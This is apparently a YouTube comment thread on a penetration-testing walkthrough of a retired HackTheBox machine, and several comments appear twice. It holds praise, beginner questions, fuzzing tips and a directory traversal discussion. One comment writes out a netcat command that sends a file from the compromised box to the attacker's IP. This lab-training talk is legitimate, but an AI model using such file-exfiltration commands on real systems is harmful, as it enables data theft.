I think it's hilarious how you easily explain super difficult things, but then your mind explodes explaining a simple concept such as MOD :) good job though, great box.
So unlucky haha i started this as my first box yesterday, reached the secure crypt part and when i was just about to resume the challenge today i saw it was retired. Anyway, great content as always. Thanks.
Because bounties are generally low (or unpredictable) pay compared to traditional employment and dealing with people can be a pain. I view bug bounties as a way for companies to get free/cheap work and don’t really want to support them. It’s definitely nice to be able to report something when you come across it, but I’m not going to go out of my way to help a company on a promise.
I don't understand the directory traversal part. He puts /../ before the .py code but the /../ means hes going back a directory when he needs to go forth to the develop directory. How does that work?? Does /../ mean any directory in this case??
The SuperSecureServer script is outside of DocRoot, there just happens to be a copy of it in DOCROOT/devel. Watch it again the part when I explain how python web apps normally work
ippsec, you should start using ffuf, its very stable and fast :D Also, I used bandit (the python vulnerability analyzer) for the SuperSecureServer.py Made my life a lot easier!
11:46 - "It's probably because it started with the hashtag" Owch Ipp - Just owch. "I run calculator and... I get a shell" Sounds like your average exploit PoC :p With the new flag system you can actually cat the flag - No need to worry about character counting it :)
Guys i need a bit help.Is the Tj null playlist of Ippsec good for oscp prep?I have done various vulnhub oscp level machines.Any other good playlist for oscp?
hey , yours videos is very awesome , i saw yours videos ,but some points i didnt get it,bcoz i am begginer, am=nd i start learning ,pentesting,plzz give me suggestion where to start for me,bcoz its very hard to understand all things
I love when you give extra knowledge! It's really helpful and we get to learn something new 😁
This was my first box, and I think it shows, with unintendeds at every step. It's been a real learning experience for me though!
I love the ramblings. That's one of the reasons why you are the best! Awesome walk-through bro.
I love your videos. I already owned this machine, but watching your video really help me learn a lot of new things. Totally recommended!
Man what a masteclass!! Including how WEP cracking works!
Thanks a lot for sharing your knowledge mate!!
Amazing!!
thanks for the extra explanations - awesome content as always!
The best explanation of the Box that you can imagine. Great job, IppSec!
Like before watching ♥️
Very much agreed on the intro, obscurity is definitely a powerful layer of security if used right.
23:28: Top 10 Anime Betrayals
I think it's hilarious how you easily explain super difficult things, but then your mind explodes explaining a simple concept such as MOD :) good job though, great box.
Thanks for diving into details it's so helpfull :)
So unlucky haha i started this as my first box yesterday, reached the secure crypt part and when i was just about to resume the challenge today i saw it was retired. Anyway, great content as always. Thanks.
Man I just got lucky did it yesterday nice box and great explanation loved it
Incredible Insight you showed me. Thanks
Thank you ippsec!
Love ur videos and thank you so much
i like your vidéo guy , it's so good , i like it
For the web. Love it
john cracks that root password hash in a split second
When you said you didnt want us to see whats in your Download folder i died laughing!
oh man , your videos are like good series :) love every episode :D .... Im a beginner , but one day ill get there :)
Do you have experience in the field ?
nice content ! i'm asking about curiosity if u are good at doing ctf's why don't you move to bug bounty ?
Because bounties are generally low (or unpredictable) pay compared to traditional employment and dealing with people can be a pain. I view bug bounties as a way for companies to get free/cheap work and don’t really want to support them. It’s definitely nice to be able to report something when you come across it, but I’m not going to go out of my way to help a company on a promise.
I don't understand the directory traversal part. He puts /../ before the .py code but the /../ means hes going back a directory when he needs to go forth to the develop directory. How does that work?? Does /../ mean any directory in this case??
The SuperSecureServer script is outside of DocRoot, there just happens to be a copy of it in DOCROOT/devel. Watch it again the part when I explain how python web apps normally work
How should I start on CTFs not Hackthbox? Please reply !
Hero.
ippsec, you should start using ffuf, its very stable and fast :D
Also, I used bandit (the python vulnerability analyzer) for the SuperSecureServer.py Made my life a lot easier!
nice info, do you have good resource to start tutorial bandit apps,
Love the videoss
Nope
@@ippsec Ahh why not xD
11:46 - "It's probably because it started with the hashtag"
Owch Ipp - Just owch.
"I run calculator and... I get a shell"
Sounds like your average exploit PoC :p
With the new flag system you can actually cat the flag - No need to worry about character counting it :)
I got frustrated from this box and left without solving...😔😒
Me too, I left it coz its brain fuck not medium
Guys i need a bit help.Is the Tj null playlist of Ippsec good for oscp prep?I have done various vulnhub oscp level machines.Any other good playlist for oscp?
A clock is a really good model to visualize modulus!
How so, can't even behind to connect the two.
47:16 lol, I see I'm not the only one who gets curious over the "why this does not work" and stop everything to find it out
bunch of insight i got. thanks for those inspiring stuff. hope my channel can grow as good as yours
I learn a lot from you..! really appreciate it..
Hello, thanks for your video.. btw, -Z parameter on wfuzz continue process after error. I found develop folder using this.
I used dirbuster for the first time on this box.
At the bottom checked the box for fuzzing and used /{dir}/SuperSecureServer.py
Found it pretty quick
I think the vs code is named Codium in repos
hey , yours videos is very awesome , i saw yours videos ,but some points i didnt get it,bcoz i am begginer, am=nd i start learning ,pentesting,plzz give me suggestion where to start for me,bcoz its very hard to understand all things
still, doing *nc -q 0 your_ip port < file_to_send* on the remote box auto terminates the nc process.
Well...that was significantly more impressive than the way i got the www-data shell. XD
How did you get it?
I remember this box. One big pain in the ass is what it is.
Woah, I did this one like 2 hours ago, I must have got lucky it was still online!
Was this free box ?
Alexandrovich is patronymic
and pronounce as alexAndrovich
You could present ffuf in the next video... Like to show different tools and everything
1:24:56 blow my mind
Alexandrovich is a Russian patronymic or middle name lol